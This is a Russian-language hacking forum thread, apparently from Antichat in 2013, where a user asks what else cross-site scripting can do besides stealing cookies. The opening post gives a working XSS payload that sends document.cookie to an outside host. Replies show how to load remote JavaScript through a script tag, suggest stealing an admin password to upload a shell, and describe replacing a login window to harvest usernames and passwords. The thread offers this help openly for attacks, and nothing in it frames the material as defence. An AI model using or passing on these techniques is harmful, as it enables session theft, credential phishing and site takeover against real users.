Что можно сделать с XSS кроме как украсть cookie?

Discussion in 'Уязвимости' started by panfilov1991, 1 Oct 2013.

  1. panfilov1991

    panfilov1991 New Member

    Joined:
    22 Jan 2013
    Messages:
    23
    Likes Received:
    1
    Reputations:
    0
    Есть пассивная XSS, работает только с этим кодом:
    Code:
    <script>
    img = new Image(); img.src = "http://httpz.ru/n4zjm6erzao.gif?"+document.cookie;
    </script>
    
    За кражу cookie отвечает +document.cookie;

    А что можно еще сделать с XSS?
    Можно ли загнать на сервер какого нибудь червя?
     
  2. Inoms

    Inoms Member

    Joined:
    23 Jun 2013
    Messages:
    103
    Likes Received:
    29
    Reputations:
    45
    Нельзя. Такое в редких случаях можно проделать только с активами и то код будет работать только на тех страницах, где он будет вшит.
     
  3. panfilov1991

    panfilov1991 New Member

    Joined:
    22 Jan 2013
    Messages:
    23
    Likes Received:
    1
    Reputations:
    0
    Есть на примере активная XSS.
    Где взять код который можно попробовать вшить?
     
  4. Inoms

    Inoms Member

    Joined:
    23 Jun 2013
    Messages:
    103
    Likes Received:
    29
    Reputations:
    45
    Подразумевается html\js сценарий, можно любой кинуть, или проинклудить js.
     
  5. panfilov1991

    panfilov1991 New Member

    Joined:
    22 Jan 2013
    Messages:
    23
    Likes Received:
    1
    Reputations:
    0
    То что код можно вшить любой я понял, как это сделать я не понимаю!
    подскажите пожалуйста!
     
  6. Inoms

    Inoms Member

    Joined:
    23 Jun 2013
    Messages:
    103
    Likes Received:
    29
    Reputations:
    45
    Так-же, как вы выполняете код сниффера, только вместо него, требуемый код. А проинклудить js можно так: "<script src="http://site/js.js"></script>", через него можно выполнять и html (document.write и т.д). То, что вы "вошьёте" через пассиву, будет существовать только конкретно для вас, т.е не запишется на страницу статически, а только после отправки запроса на уязвимый параметр.
     
  7. M_script

    M_script Members of Antichat

    Joined:
    4 Nov 2004
    Messages:
    2,672
    Likes Received:
    1,268
    Reputations:
    1,557
    Выучить JS самому или заказать у кого-нибудь написание кода за деньги.

    upd:
    Пример того, что можно делать с пассивкой - https://forum.antichat.ru/thread275417.html
     
    #7 M_script, 1 Oct 2013
    Last edited: 1 Oct 2013
    1 person likes this.
  8. Enesey

    Enesey New Member

    Joined:
    10 May 2013
    Messages:
    12
    Likes Received:
    0
    Reputations:
    0
    Что мешает с помощью XSS украсть пароль админа и там уже дальше залить шелл или что тебе там нужно?
     
  9. sl1k

    sl1k Member

    Joined:
    31 Jul 2009
    Messages:
    155
    Likes Received:
    26
    Reputations:
    5
    сделай js файл который подменит окно авторизации,
    черз свою xss подгрузи этот файл, и логины:пароли у тебя в кармане, если повезет может и админа подловишь
     
Loading...